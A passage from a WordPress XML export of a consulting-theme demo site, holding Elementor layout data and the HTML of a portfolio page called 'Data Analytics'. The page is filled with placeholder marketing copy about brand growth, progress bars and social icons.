		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4b87d4ec","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"f7bb697","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"1a84b099","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1b756974","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"474af26d","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"504f8cda","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1a48f134","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8c88c53","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"196761d3","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"7b262c88","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"7a91d778","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"50b0e82d","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5a058e3b","elType":"widget","settings":{"editor":"<p>October 02, 2020<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"662d291f","elType":"widget","settings":{"title":"Category:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"254317b1","elType":"widget","settings":{"editor":"<p>Marketing\/Finance<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6d56a150","elType":"section","settings":{"padding":{"unit":"px","top":"0","right":"0","bottom":"45","left":"0","isLinked":false}},"elements":[{"id":"37b90133","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"9e89dbb","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/project-details.jpg","id":780},"image_size":"full","image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"9cfba41","elType":"section","settings":[],"elements":[{"id":"e128777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"4ba1866","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">01.<\/span> \u0421hallenge","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"3d506f2","elType":"widget","settings":{"editor":"<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"592f325","elType":"widget","settings":{"icon_list":[{"text":"<span style=\"color:#262832; font-weight:600;\">the organization is just beginning to operate<\/span> in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b098382"},{"text":"<span style=\"color:#262832; font-weight:600;\">there are projects that require temporary expansion<\/span> of the marketing department. Customer-focused businesses build a virtuous cycle we call the \"customer wheel.\" We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"7ebdebe"}],"space_between":{"unit":"px","size":17,"sizes":[]},"icon_color":"#4B83FC","icon_size":{"unit":"px","size":6,"sizes":[]},"text_indent":{"unit":"px","size":14,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"19","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"5532f46","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":45,"sizes":[]},"gap_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"20252c5","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">02.<\/span> Solutions","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6c8fde3","elType":"widget","settings":{"editor":"<p>What\u2019s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style=\"color: #1b1d21; font-weight: 600;\">The same technology advances have dramatically <\/span>altered the competitive landscape.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"6679f65","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"40"},"elements":[{"id":"133d0c3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6645d22","elType":"widget","settings":{"bar_style":"circle","title":"marketing analysis","percent":{"unit":"%","size":75,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"e940c13","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"a98ad24","elType":"widget","settings":{"bar_style":"circle","title":"business innovation","percent":{"unit":"%","size":65,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"0a54049","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"6c973b9","elType":"widget","settings":{"bar_style":"circle","title":"finance strategy","percent":{"unit":"%","size":90,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true},{"id":"44173c4","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_mobile":100,"_inline_size_tablet":50},"elements":[{"id":"20c25a1","elType":"widget","settings":{"bar_style":"circle","title":"corporate management","percent":{"unit":"%","size":45,"sizes":[]},"bar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"ffc26b3","elType":"widget","settings":{"text":"Divider","color":"#0000001A","gap":{"unit":"px","size":35,"sizes":[]}},"elements":[],"widgetType":"divider"},{"id":"43ea833","elType":"widget","settings":{"title":"<span style=\"color:#4b83fc\">03.<\/span> Results","header_size":"h5","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"b1c8861","elType":"section","settings":{"gap":"no","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"layout":"full_width","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"af1146b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"0c59542","elType":"widget","settings":{"editor":"<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.<\/p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery <span style=\"color: #4b83fc;\">around their pricing strategy.<\/span> The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.<\/p>","_padding":{"unit":"px","top":"0","right":"42","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"c47cc6c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"cbd6c20","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home-2.png","id":1480},"image_size":"full","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"-15","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true}],"isInner":true},{"id":"eb28a1c","elType":"widget","settings":{"social_icon_list":[{"social_icon":{"value":"fab fa-twitter","library":"fa-brands"},"_id":"049712d","item_icon_color":"custom","item_icon_primary_color":"#51AFF7","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-facebook-f","library":"fa-brands"},"_id":"030f11b","item_icon_color":"custom","item_icon_primary_color":"#284BAF","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-google-plus-g","library":"fa-brands"},"_id":"9c6b4b3","item_icon_color":"custom","item_icon_primary_color":"#E03609","item_icon_secondary_color":"#FFFFFF"},{"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brands"},"_id":"b977f7f","item_icon_color":"custom","item_icon_primary_color":"#E40000","item_icon_secondary_color":"#FFFFFF"}],"icon_color":"custom","icon_primary_color":"rgba(26, 26, 26, 0)","icon_secondary_color":"#1A1A1A","icon_size":{"unit":"px","size":14,"sizes":[]},"icon_spacing":{"unit":"px","size":15,"sizes":[]},"image_border_border":"solid","image_border_width":{"unit":"px","top":"1","right":"1","bottom":"1","left":"1","isLinked":true},"image_border_color":"rgba(255, 255, 255, 0)","border_radius":{"unit":"px","top":"50","right":"50","bottom":"50","left":"50","isLinked":true},"hover_border_color":"rgba(255, 255, 255, 0)","columns":"4","align":"right","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[],"widgetType":"social-icons"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_controls_usage]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:9:{s:11:"text-editor";a:3:{s:5:"count";i:8;s:15:"control_percent";i:1;s:8:"controls";a:2:{s:7:"content";a:1:{s:14:"section_editor";a:2:{s:6:"editor";i:8;s:8:"drop_cap";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:15:"_padding_mobile";i:3;s:15:"_padding_tablet";i:1;s:8:"_padding";i:5;}}}}s:6:"column";a:3:{s:5:"count";i:12;s:15:"control_percent";i:0;s:8:"controls";a:1:{s:6:"layout";a:1:{s:6:"layout";a:3:{s:12:"_inline_size";i:12;s:19:"_inline_size_tablet";i:8;s:19:"_inline_size_mobile";i:6;}}}}s:7:"heading";a:3:{s:5:"count";i:7;s:15:"control_percent";i:1;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_title";a:2:{s:5:"title";i:7;s:11:"header_size";i:7;}}s:5:"style";a:1:{s:19:"section_title_style";a:5:{s:11:"title_color";i:4;s:21:"typography_typography";i:4;s:22:"typography_font_family";i:4;s:20:"typography_font_size";i:4;s:22:"typography_font_weight";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:7;}}}}s:7:"section";a:3:{s:5:"count";i:6;s:15:"control_percent";i:0;s:8:"controls";a:3:{s:6:"layout";a:2:{s:14:"section_layout";a:3:{s:3:"gap";i:4;s:16:"content_position";i:1;s:6:"layout";i:2;}s:17:"section_structure";a:1:{s:9:"structure";i:4;}}s:5:"style";a:2:{s:18:"section_background";a:2:{s:21:"background_background";i:1;s:16:"background_color";i:1;}s:14:"section_border";a:1:{s:13:"border_radius";i:1;}}s:8:"advanced";a:2:{s:16:"section_advanced";a:2:{s:7:"padding";i:4;s:14:"padding_mobile";i:1;}s:19:"_section_responsive";a:2:{s:20:"reverse_order_tablet";i:1;s:20:"reverse_order_mobile";i:1;}}}}s:5:"image";a:3:{s:5:"count";i:2;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:13:"section_image";a:2:{s:5:"image";i:2;s:10:"image_size";i:2;}}s:5:"style";a:1:{s:19:"section_style_image";a:1:{s:19:"image_border_radius";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:3:{s:7:"_margin";i:1;s:14:"_margin_mobile";i:1;s:15:"_padding_tablet";i:1;}}}}s:9:"icon-list";a:3:{s:5:"count";i:1;s:15:"control_percent";i:3;s:8:"controls";a:3:{s:7:"content";a:1:{s:12:"section_icon";a:1:{s:9:"icon_list";i:1;}}s:5:"style";a:3:{s:17:"section_icon_list";a:1:{s:13:"space_between";i:1;}s:18:"section_icon_style";a:2:{s:10:"icon_color";i:1;s:9:"icon_size";i:1;}s:18:"section_text_style";a:1:{s:11:"text_indent";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}s:7:"divider";a:3:{s:5:"count";i:2;s:15:"control_percent";i:1;s:8:"controls";a:1:{s:5:"style";a:1:{s:21:"section_divider_style";a:3:{s:5:"color";i:2;s:3:"gap";i:2;s:10:"gap_mobile";i:1;}}}}s:9:"iprogress";a:3:{s:5:"count";i:4;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"content_section";a:3:{s:9:"bar_style";i:4;s:5:"title";i:4;s:7:"percent";i:4;}}s:8:"advanced";a:1:{s:14:"_section_style";a:2:{s:15:"_padding_tablet";i:2;s:15:"_padding_mobile";i:1;}}s:5:"style";a:1:{s:17:"bar_style_section";a:1:{s:9:"bar_color";i:4;}}}}s:12:"social-icons";a:3:{s:5:"count";i:1;s:15:"control_percent";i:6;s:8:"controls";a:3:{s:7:"content";a:1:{s:19:"section_social_icon";a:3:{s:16:"social_icon_list";i:1;s:7:"columns";i:1;s:5:"align";i:1;}}s:5:"style";a:2:{s:20:"section_social_style";a:9:{s:10:"icon_color";i:1;s:18:"icon_primary_color";i:1;s:20:"icon_secondary_color";i:1;s:9:"icon_size";i:1;s:12:"icon_spacing";i:1;s:19:"image_border_border";i:1;s:18:"image_border_width";i:1;s:18:"image_border_color";i:1;s:13:"border_radius";i:1;}s:20:"section_social_hover";a:1:{s:18:"hover_border_color";i:1;}}s:8:"advanced";a:1:{s:14:"_section_style";a:1:{s:8:"_padding";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Data Analytics</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/portfolio/data-analytics/</link>
		<pubDate>Fri, 11 Sep 2020 07:08:23 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?post_type=ot_portfolio&#038;p=826</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>OceanThemes</p>		
			<h6>Website:</h6>		
		<p>oceanthemes.net</p>		
			<h6>Date:</h6>		
		<p>March 26, 2019</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project-home-2.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-home-2-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener">
						Twitter
											</a>
					<a target="_blank" rel="noopener">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>826</wp:post_id>
		<wp:post_date><![CDATA[2020-09-11 07:08:23]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-11 07:08:23]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[data-analytics]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[ot_portfolio]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="portfolio_cat" nicename="startup"><![CDATA[startup]]></category>
		<category domain="portfolio_cat" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_thumbnail_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[827]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-post]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.14]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4ff3a9c5","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"41414446","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"7cea63e4","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"17a99080","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"277d3a66","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"731b7798","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"1ccb559a","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"889c447","elType":"widget","settings":{"editor":"<p>OceanThemes<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"27258f6a","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5c1d64ba","elType":"widget","settings":{"editor":"<p>oceanthemes.net<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"677ece23","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"427fc382","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6b572066","elType":"widget","settings":{"editor":"<p>March 26, 